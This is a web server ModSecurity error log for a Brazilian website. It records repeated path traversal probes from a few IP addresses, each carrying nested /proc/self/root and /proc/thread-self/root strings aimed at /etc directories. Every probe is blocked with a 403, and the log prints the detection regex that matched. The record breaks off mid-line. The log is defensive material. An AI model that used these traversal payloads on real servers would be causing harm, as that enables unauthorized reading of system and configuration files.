[Tue Mar 17 09:06:21.096983 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.241.46:36768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDvdCmCSWTlPouqorH0QAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:22.258774 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.46:36778] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDvqBJNF7axNlVR0X5pgAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:23.575252 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.241.46:36780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDv9CmCSWTlPouqorH0gAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:06:26.847462 2026] [:error] [pid 1210:tid 140411582465792] [client 74.7.241.46:36788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDwlKJy4A1bGlmj9BSPwAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:06:30.187178 2026] [:error] [pid 2305:tid 140411674785536] [client 74.7.241.46:50090] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDxgQohV2v-7oj5HH3hwAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:06:31.566718 2026] [:error] [pid 7000:tid 140411708356352] [client 74.7.241.46:50104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDxxePVOt35XCGZP8sPQAAA4Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:06:33.806574 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.243.203:36758] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDyZDEJR9VXonE_-1K3AAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:36.143025 2026] [:error] [pid 11469:tid 140411683178240] [client 74.7.243.203:57762] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDzJDEJR9VXonE_-1K3wAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:06:37.398472 2026] [:error] [pid 1961:tid 140411599251200] [client 74.7.241.46:50114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDzXRXaaWotPICgYsiLwAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:06:39.978204 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.241.46:49644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDz9CmCSWTlPouqorH1wAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:06:41.791756 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:57776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD0QeiSKl8TjouI-b_FQAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:44.791402 2026] [:error] [pid 1210:tid 140411733534464] [client 74.7.241.46:49650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD1FKJy4A1bGlmj9BSSAAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:48.699415 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.241.46:49652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD2O82sZHvlq4xgHq_rgAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:55.567357 2026] [:error] [pid 7000:tid 140411540502272] [client 74.7.241.46:52474] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD3xePVOt35XCGZP8sRgAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:06:56.863052 2026] [:error] [pid 1961:tid 140411649607424] [client 74.7.241.46:52480] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD4HRXaaWotPICgYsiNQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:06:58.139040 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.241.46:36320] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD4pDEJR9VXonE_-1LBgAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:06:59.429151 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.241.46:36334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD4weiSKl8TjouI-b_GAAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:00.754187 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.46:36350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD5KBJNF7axNlVR0X5rwAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:02.294713 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.241.46:36354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD5tCmCSWTlPouqorH3AAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:03.666373 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.241.46:36360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD55qmL8PQht4WJFlD8gAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:17.980070 2026] [:error] [pid 7000:tid 140411574073088] [client 74.7.241.46:36362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablD9RePVOt35XCGZP8sVwAAA5Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:19.383118 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.46:55144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 